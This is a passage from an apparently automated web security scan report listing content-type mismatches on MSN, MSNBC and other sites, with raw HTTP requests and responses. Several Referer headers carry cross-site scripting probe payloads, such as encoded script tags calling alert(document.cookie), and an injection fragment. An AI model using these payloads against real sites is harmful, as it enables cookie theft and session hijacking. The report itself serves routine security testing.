GET /info/secondary/ HTTP/1.1
Host: info.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sun, 30 Jan 2011 15:59:00 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store
Content-Length: 364

JvnDtIsjUb/zVcQlQjZuod1g4vn09yqJVquOxJLM1d0+7Ucr+fmPdNj9Qmd0A8zJYQMWCk5bA/+Hv8sMO3my6Srpq95F78/9aIYU6wc8ZA1JRLeAq8bt655WrxRBsXiMCu8mEpioRIggSwrMH0yM3CGvInd8RSqrom2/5K2+SqvrvUQpxCcoUHkoTZ0vMYAyclWFTi1u
...[SNIP]...

34.36. http://investing.money.redacted/mv/MarketStatus

Summary

Severity:   Information
Confidence:   Firm
Host:   http://investing.money.redacted
Path:   /mv/MarketStatus

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /mv/MarketStatus?callback=jsonp1296350843300 HTTP/1.1
Host: investing.money.redacted
Proxy-Connection: keep-alive
Referer: http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=r0s4x3z5mhs3dbzck3llxj4w; path=/; HttpOnly
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:27:26 GMT
Content-Length: 49

jsonp1296350843300(["U.S. markets closed",81152])

34.37. http://investing.money.redacted/mv/MarketStatus/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://investing.money.redacted
Path:   /mv/MarketStatus/

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /mv/MarketStatus/?callback=jsonp1296392471559 HTTP/1.1
Host: investing.money.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:21 GMT
Content-Length: 49

jsonp1296392471559(["U.S. markets closed",39578])

34.38. http://investing.money.redacted/mv/RecentQuotes/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://investing.money.redacted
Path:   /mv/RecentQuotes/

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /mv/RecentQuotes/?callback=jsonp1296350843302 HTTP/1.1
Host: investing.money.redacted
Proxy-Connection: keep-alive
Referer: http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kqt2o2pqwn51vivfhae3doc5; path=/; HttpOnly
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:27:27 GMT
Content-Length: 24

jsonp1296350843302([""])

34.39. http://javadl-esd.sun.com/update/AU/map-2.0.2.4.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://javadl-esd.sun.com
Path:   /update/AU/map-2.0.2.4.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /update/AU/map-2.0.2.4.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: javadl-esd.sun.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Date: Sun, 30 Jan 2011 15:49:18 GMT
Connection: close
Cache-Control: private

File not found.

34.40. http://lib.newsvine.com/chrome/photoblog/images/footer.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://lib.newsvine.com
Path:   /chrome/photoblog/images/footer.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /chrome/photoblog/images/footer.jpg HTTP/1.1
Host: lib.newsvine.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:19:40 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 17 May 2010 19:43:06 GMT
ETag: "a38282-13800-486cf6f082680"
Accept-Ranges: bytes
Content-Length: 79872
Content-Type: image/jpeg

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Macintosh.2010:05:13 18:12:36.......
...[SNIP]...

34.41. http://lib.newsvine.com/chrome/thelastword/images/promo_videoplayer.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://lib.newsvine.com
Path:   /chrome/thelastword/images/promo_videoplayer.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /chrome/thelastword/images/promo_videoplayer.gif HTTP/1.1
Host: lib.newsvine.com
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 12:47:33 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Thu, 23 Sep 2010 23:55:55 GMT
ETag: "10cc54b-5bc9-490f600b418c0"
Accept-Ranges: bytes
Content-Length: 23497
Content-Type: image/gif

......JFIF.....H.H....    .Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Macintosh.2010:09:21 11:36:13.......
...[SNIP]...

34.42. http://local.redacted/ten-day.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://local.redacted
Path:   /ten-day.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /ten-day.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:47:51 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

34.43. http://local.redacted/weather.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://local.redacted
Path:   /weather.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /weather.aspx?q=New York-NY&zip=10038 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:47:41 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

34.44. http://redacted/inc/Views/Shared/Core/Content/js/utility.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneycentral.msn.com
Path:   /inc/Views/Shared/Core/Content/js/utility.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /inc/Views/Shared/Core/Content/js/utility.js HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 19:53:16 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.45. http://redacted/investor/StockRating/srsmain.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srsmain.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /investor/StockRating/srsmain.asp HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:04:07 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.46. http://redacted/investor/home.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneycentral.msn.com
Path:   /investor/home.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 16:51:21 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.47. http://redacted/investor/market/earncalendar/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneycentral.msn.com
Path:   /investor/market/earncalendar/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /investor/market/earncalendar/ HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:03:37 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.48. http://redacted/investor/market/treasuries.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneycentral.msn.com
Path:   /investor/market/treasuries.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /investor/market/treasuries.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:47 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.49. http://redacted/investor/partsub/funds/etfperformancetracker.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://moneycentral.msn.com
Path:   /investor/partsub/funds/etfperformancetracker.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /investor/partsub/funds/etfperformancetracker.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:12:39 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

34.50. http://msnbcmedia.redacted/j/ap/gays

Summary

Severity:   Information
Confidence:   Firm
Host:   http://msnbcmedia.redacted
Path:   /j/ap/gays

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/gays HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:41 GMT
Connection: close

<h1>404 Image Not Found</h1>

34.51. http://msnbcmedia.redacted/j/ap/missing

Summary

Severity:   Information
Confidence:   Firm
Host:   http://msnbcmedia.redacted
Path:   /j/ap/missing

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/missing HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:34 GMT
Connection: close

<h1>404 Image Not Found</h1>

34.52. http://msnbcmedia.redacted/j/ap/nannies

Summary

Severity:   Information
Confidence:   Firm
Host:   http://msnbcmedia.redacted
Path:   /j/ap/nannies

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/nannies HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Date: Sun, 30 Jan 2011 02:16:30 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Connection: close

<h1>404 Image Not Found</h1>

34.53. http://msnbcmedia.redacted/j/ap/super

Summary

Severity:   Information
Confidence:   Firm
Host:   http://msnbcmedia.redacted
Path:   /j/ap/super

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/super HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:41 GMT
Connection: close

<h1>404 Image Not Found</h1>

34.54. http://msnbcmedia.redacted/j/ap/switzerland

Summary

Severity:   Information
Confidence:   Firm
Host:   http://msnbcmedia.redacted
Path:   /j/ap/switzerland

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/switzerland HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:36 GMT
Connection: close

<h1>404 Image Not Found</h1>

34.55. http://msnbcmedia.redacted/j/ap/tampa

Summary

Severity:   Information
Confidence:   Firm
Host:   http://msnbcmedia.redacted
Path:   /j/ap/tampa

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /j/ap/tampa HTTP/1.1
Host: msnbcmedia.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:37 GMT
Connection: close

<h1>404 Image Not Found</h1>

34.56. http://offers.lendingtree.com/splitter/splitter.ashx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://offers.lendingtree.com
Path:   /splitter/splitter.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /splitter/splitter.ashx HTTP/1.1
Host: offers.lendingtree.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 29 Jan 2011 23:50:25 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Nickname: Scooby Doo
X-Powered-By: ASP.NET
Content-Length: 48
Connection: Close

The given key was not present in the dictionary.

34.57. http://oneightyla.vo.llnwd.net/o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oneightyla.vo.llnwd.net
Path:   /o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv HTTP/1.1
Host: oneightyla.vo.llnwd.net
Proxy-Connection: keep-alive
Referer: http://ec.redcated/ds/UXULASONYSEL/BloggieHoliday_HD_PC/Flash_300x250_HD_PC_promo.swf?ver=1&clickTag1=http://clk.redcated/go/296652509/direct;ai.200329627;ct.1/01&clickTag=http://clk.redcated/go/296652509/direct;ai.200329627;ct.1/01
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 521037
X-Permitted-Cross-Domain-Policies: all
Content-Type: text/plain
Age: 112773
Date: Sun, 30 Jan 2011 01:19:49 GMT
Last-Modified: Mon, 22 Nov 2010 09:25:05 GMT
Connection: keep-alive

FLV.....    .................
onMetaData....
..duration.@,.E......width.@d........height.@V.......videodatarate.@i.......    framerate.@=.S......videocodecid.@........audiodatarate.@P.......
audiodelay.?.
...[SNIP]...

34.58. http://openchannel.msnbc.redacted/_vine/printer

Summary

Severity:   Information
Confidence:   Firm
